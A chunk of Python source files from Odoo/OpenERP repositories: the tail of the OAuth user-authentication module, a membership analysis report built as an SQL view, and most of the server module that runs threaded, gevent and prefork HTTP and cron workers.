assert len(user_ids) == 1
user = self.browse(cr, uid, user_ids[0], context=context)
user.write({'oauth_access_token': params['access_token']})
return user.login
except openerp.exceptions.AccessDenied, access_denied_exception:
if context and context.get('no_user_creation'):
return None
state = simplejson.loads(params['state'])
token = state.get('t')
oauth_uid = validation['user_id']
email = validation.get('email', 'provider_%s_user_%s' % (provider, oauth_uid))
name = validation.get('name', email)
values = {
'name': name,
'login': email,
'email': email,
'oauth_provider_id': provider,
'oauth_uid': oauth_uid,
'oauth_access_token': params['access_token'],
'active': True,
}
try:
_, login, _ = self.signup(cr, uid, values, token, context=context)
return login
except SignupError:
raise access_denied_exception
def auth_oauth(self, cr, uid, provider, params, context=None):
# Advice by Google (to avoid Confused Deputy Problem)
# if validation.audience != OUR_CLIENT_ID:
# abort()
# else:
# continue with the process
access_token = params.get('access_token')
validation = self._auth_oauth_validate(cr, uid, provider, access_token)
# required check
if not validation.get('user_id'):
raise openerp.exceptions.AccessDenied()
# retrieve and sign in user
login = self._auth_oauth_signin(cr, uid, provider, validation, params, context=context)
if not login:
raise openerp.exceptions.AccessDenied()
# return user credentials
return (cr.dbname, login, access_token)
def check_credentials(self, cr, uid, password):
try:
return super(res_users, self).check_credentials(cr, uid, password)
except openerp.exceptions.AccessDenied:
res = self.search(cr, SUPERUSER_ID, [('id', '=', uid), ('oauth_access_token', '=', password)])
if not res:
raise
#
| agpl-3.0 |
nuuuboo/odoo | addons/membership/report/report_membership.py | 313 | 5267 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp import tools
import openerp.addons.decimal_precision as dp
STATE = [
('none', 'Non Member'),
('canceled', 'Cancelled Member'),
('old', 'Old Member'),
('waiting', 'Waiting Member'),
('invoiced', 'Invoiced Member'),
('free', 'Free Member'),
('paid', 'Paid Member'),
]
class report_membership(osv.osv):
'''Membership Analysis'''
_name = 'report.membership'
_description = __doc__
_auto = False
_rec_name = 'start_date'
_columns = {
'start_date': fields.date('Start Date', readonly=True),
'date_to': fields.date('End Date', readonly=True, help="End membership date"),
'num_waiting': fields.integer('# Waiting', readonly=True),
'num_invoiced': fields.integer('# Invoiced', readonly=True),
'num_paid': fields.integer('# Paid', readonly=True),
'tot_pending': fields.float('Pending Amount', digits_compute= dp.get_precision('Account'), readonly=True),
'tot_earned': fields.float('Earned Amount', digits_compute= dp.get_precision('Account'), readonly=True),
'partner_id': fields.many2one('res.partner', 'Member', readonly=True),
'associate_member_id': fields.many2one('res.partner', 'Associate Member', readonly=True),
'membership_id': fields.many2one('product.product', 'Membership Product', readonly=True),
'membership_state': fields.selection(STATE, 'Current Membership State', readonly=True),
'user_id': fields.many2one('res.users', 'Salesperson', readonly=True),
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'quantity': fields.integer("Quantity", readonly=True),
}
def init(self, cr):
'''Create the view'''
tools.drop_view_if_exists(cr, 'report_membership')
cr.execute("""
CREATE OR REPLACE VIEW report_membership AS (
SELECT
MIN(id) AS id,
partner_id,
count(membership_id) as quantity,
user_id,
membership_state,
associate_member_id,
membership_amount,
date_to,
start_date,
COUNT(num_waiting) AS num_waiting,
COUNT(num_invoiced) AS num_invoiced,
COUNT(num_paid) AS num_paid,
SUM(tot_pending) AS tot_pending,
SUM(tot_earned) AS tot_earned,
membership_id,
company_id
FROM
(SELECT
MIN(p.id) AS id,
p.id AS partner_id,
p.user_id AS user_id,
p.membership_state AS membership_state,
p.associate_member AS associate_member_id,
p.membership_amount AS membership_amount,
p.membership_stop AS date_to,
p.membership_start AS start_date,
CASE WHEN ml.state = 'waiting' THEN ml.id END AS num_waiting,
CASE WHEN ml.state = 'invoiced' THEN ml.id END AS num_invoiced,
CASE WHEN ml.state = 'paid' THEN ml.id END AS num_paid,
CASE WHEN ml.state IN ('waiting', 'invoiced') THEN SUM(il.price_subtotal) ELSE 0 END AS tot_pending,
CASE WHEN ml.state = 'paid' OR p.membership_state = 'old' THEN SUM(il.price_subtotal) ELSE 0 END AS tot_earned,
ml.membership_id AS membership_id,
p.company_id AS company_id
FROM res_partner p
LEFT JOIN membership_membership_line ml ON (ml.partner = p.id)
LEFT JOIN account_invoice_line il ON (ml.account_invoice_line = il.id)
LEFT JOIN account_invoice ai ON (il.invoice_id = ai.id)
WHERE p.membership_state != 'none' and p.active = 'true'
GROUP BY
p.id,
p.user_id,
p.membership_state,
p.associate_member,
p.membership_amount,
p.membership_start,
ml.membership_id,
p.company_id,
ml.state,
ml.id
) AS foo
GROUP BY
start_date,
date_to,
partner_id,
user_id,
membership_id,
company_id,
membership_state,
associate_member_id,
membership_amount
)""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
datenbetrieb/odoo | openerp/service/server.py | 17 | 37987 | #-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import random
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import unittest2
import werkzeug.serving
if os.name == 'posix':
# Unix only for workers
import fcntl
import resource
import psutil
else:
# Windows shim
signal.SIGHUP = -1
# Optional process names for workers
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
from openerp.modules.registry import RegistryManager
from openerp.release import nt_service_name
import openerp.tools.config as config
from openerp.tools import stripped_sys_argv, dumpstacks, log_ormcache_stats
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
""" psutil < 2.0 does not have memory_info, >= 3.0 does not have
get_memory_info """
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
return (pmem.rss, pmem.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class LoggingBaseWSGIServerMixIn(object):
def handle_error(self, request, client_address):
t, e, _ = sys.exc_info()
if t == socket.error and e.errno == errno.EPIPE:
# broken pipe, ignore error
return
_logger.exception('Exception happened during processing of request from %s', client_address)
class BaseWSGIServerNoBind(LoggingBaseWSGIServerMixIn, werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "127.0.0.1", 0, app)
# Directly close the socket. It will be replaced by WorkerHTTP when processing requests
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
class RequestHandler(werkzeug.serving.WSGIRequestHandler):
def setup(self):
# flag the current thread as handling a http request
super(RequestHandler, self).setup()
me = threading.currentThread()
me.name = 'openerp.service.http.request.%s' % (me.ident,)
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(LoggingBaseWSGIServerMixIn, werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def __init__(self, host, port, app):
super(ThreadedWSGIServerReloadable, self).__init__(host, port, app,
handler=RequestHandler)
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd)) ? it seem python duplicate the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.modules.module.ad_paths:
_logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
for i in xml_files:
for path in openerp.modules.module.ad_paths:
if i.startswith(path):
# find out wich addons path the file belongs to
# and extract it's module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module] = 1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s', i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error, e:
if e.errno == errno.EBADF:
# Werkzeug > 0.9.6 closes the socket itself (see commit
# https://github.com/mitsuhiko/werkzeug/commit/4d8ca089)
return
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT, signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
self.quit_signals_received += 1
def cron_thread(self, number):
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = openerp.modules.registry.RegistryManager.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.iteritems():
while registry.ready:
try:
acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
if not acquired:
break
except Exception:
_logger.warning('cron%d encountered an Exception:', number, exc_info=True)
break
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(openerp.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i)
t.setDaemon(True)
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e, s):
return self.app(e, s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
t = threading.Thread(target=self.http_thread, name="openerp.service.httpd")
t.setDaemon(True)
t.start()
_logger.info('HTTP service (werkzeug) running on %s:%s', self.interface, self.port)
def start(self, stop=False):
_logger.debug("Setting signal handlers")
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
test_mode = config['test_enable'] or config['test_file']
if test_mode or (config['xmlrpc'] and not stop):
# some tests need the http deamon to be available...
self.http_spawn()
if not stop:
# only relevant if we are not in "--stop-after-init" mode
self.cron_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
if self.httpd:
self.httpd.shutdown()
self.close_socket(self.httpd.socket)
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id:
while thread.isAlive():
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
openerp.modules.registry.RegistryManager.delete_all()
logging.shutdown()
def run(self, preload=None, stop=False):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start(stop=stop)
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler.) The try/except is for the win32 case.
try:
while self.quit_signals_received == 0:
time.sleep(60)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def watch_parent(self, beat=4):
import gevent
ppid = os.getppid()
while True:
if ppid != os.getppid():
pid = os.getpid()
_logger.info("LongPolling (%s) Parent changed", pid)
# suicide !!
os.kill(pid, signal.SIGTERM)
return
gevent.sleep(beat)
def start(self):
import gevent
from gevent.wsgi import WSGIServer
if os.name == 'posix':
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
gevent.spawn(self.watch_parent)
self.httpd = WSGIServer((self.interface, self.port), self.app)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
try:
self.httpd.serve_forever()
except:
_logger.exception("Evented Service (longpolling): uncaught error during main loop")
raise
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self, preload, stop):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
method between workers but we plan to replace it by a more intelligent
dispatcher to will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = config['xmlrpc'] and \
(config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], '.')
except IOError, e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv()
cmd = nargs[0]
cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
nargs[0] = cmd
popen = subprocess.Popen([sys.executable] + nargs)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid == self.long_polling_pid:
self.long_polling_pid = None
if pid in self.workers:
_logger.debug("Worker (%s) unregistered", pid)
try:
self.workers_http.pop(pid, None)
self.workers_cron.pop(pid, None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError, e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT, signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
self.dumpstacks()
elif sig == signal.SIGUSR1:
# log ormcache stats on kill -SIGUSR1
log_ormcache_stats()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError, e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if worker.watchdog_timeout is not None and \
(now - worker.watchdog_time) >= worker.watchdog_timeout:
_logger.error("Worker (%s) timeout", pid)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
if config['xmlrpc']:
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
if not self.long_polling_pid:
self.long_polling_spawn()
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
def sleep(self):
try:
# map of fd -> worker
fds = dict([(w.watchdog_pipe[0], w) for k, w in self.workers.items()])
fd_in = fds.keys() + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
try:
# empty pipe
while os.read(fd, 1):
pass
except OSError, e:
if e.errno not in [errno.EAGAIN]:
raise
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def start(self):
# wakeup pipe, python doesnt throw EINTR when a syscall is interrupted
# by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
if self.address:
# listen to socket
_logger.info('HTTP service (werkzeug) running on %s:%s', *self.address)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8 * self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
# FIXME make longpolling process handle SIGTERM correctly
self.worker_kill(self.long_polling_pid, signal.SIGKILL)
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGINT)
while self.workers and time.time() < limit:
try:
self.process_signals()
except KeyboardInterrupt:
_logger.info("Forced shutdown.")
break
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
if self.socket:
self.socket.close()
def run(self, preload, stop):
self.start()
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Empty the cursor pool, we dont want them to be shared among forked workers.
openerp.sql_db.close_all()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception, e:
_logger.exception(e)
self.stop(False)
return -1
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def sleep(self):
try:
select.select([self.multi.socket], [], [], self.multi.beat)
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def process_limit(self):
# If our parent changed sucide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
rss, vms = memory_info(psutil.Process(os.getpid()))
if vms > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
self.alive = False # Commit suicide after the request.
# VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))
# SIGXCPU (exceeded CPU time) signal handler will raise an exception.
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
def time_expired(n, stack):
_logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
# We dont suicide in such case
raise Exception('CPU time limit exceeded.')
signal.signal(signal.SIGXCPU, time_expired)
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
if self.multi.socket:
# Prevent fd inheritance: close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
def stop(self):
pass
def run(self):
try:
self.start()
while self.alive:
self.process_limit()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
self.process_work()
_logger.info("Worker (%s) exiting. request_count: %s, registry count: %s.",
self.pid, self.request_count,
len(openerp.modules.registry.RegistryManager.registries))
self.stop()
except Exception:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def process_request(self, client, addr):
client.setblocking(1)
client.settimeout(2)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client, addr)
except IOError, e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error, e:
if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
time.sleep(interval)
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = openerp.service.db.exp_list(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_rss, start_vms = memory_info(psutil.Process(os.getpid()))
import openerp.addons.base as base
base.ir.ir_cron.ir_cron._acquire_job(db_name)
openerp.modules.registry.RegistryManager.delete(db_name)
# dont keep cursors in multi database mode
if len(db_names) > 1:
openerp.sql_db.close_db(db_name)
if rpc_request_flag:
run_time = time.time() - start_time
end_rss, end_vms = memory_info(psutil.Process(os.getpid()))
vms_diff = (end_vms - start_vms) / 1024
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
(db_name, run_time, start_vms / 1024, end_vms / 1024, vms_diff)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
if self.multi.socket:
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
for m in openerp.conf.server_wide_modules:
try:
openerp.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if openerp.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
os.execv(sys.executable, args)
def load_test_file_yml(registry, test_file):
with registry.cursor() as cr:
openerp.tools.convert_yaml_import(cr, 'base', file(test_file), 'test', {}, 'init')
if config['test_commit']:
_logger.info('test %s has been commited', test_file)
cr.commit()
else:
_logger.info('test %s has been rollbacked', test_file)
cr.rollback()
def load_test_file_py(registry, test_file):
# Locate python module based on its filename and run the tests
test_path, _ = os.path.splitext(os.path.abspath(test_file))
for mod_name, mod_mod in sys.modules.items():
if mod_mod:
mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
if test_path == mod_path:
suite = unittest2.TestSuite()
for t in unittest2.TestLoader().loadTestsFromModule(mod_mod):
suite.addTest(t)
_logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
stream = openerp.modules.module.TestStream()
result = unittest2.TextTestRunner(verbosity=2, stream=stream).run(suite)
success = result.wasSuccessful()
if hasattr(registry._assertion_report,'report_result'):
registry._assertion_report.report_result(success)
if not success:
_logger.error('%s: at least one error occurred in a test', test_file)
def preload_registries(dbnames):
""" Preload a registries, possibly run a test file."""
# TODO: move all config checks to args dont check tools.config here
config = openerp.tools.config
test_file = config['test_file']
dbnames = dbnames or []
rc = 0
for dbname in dbnames:
try:
update_module = config['init'] or config['update']
registry = RegistryManager.new(dbname, update_module=update_module)
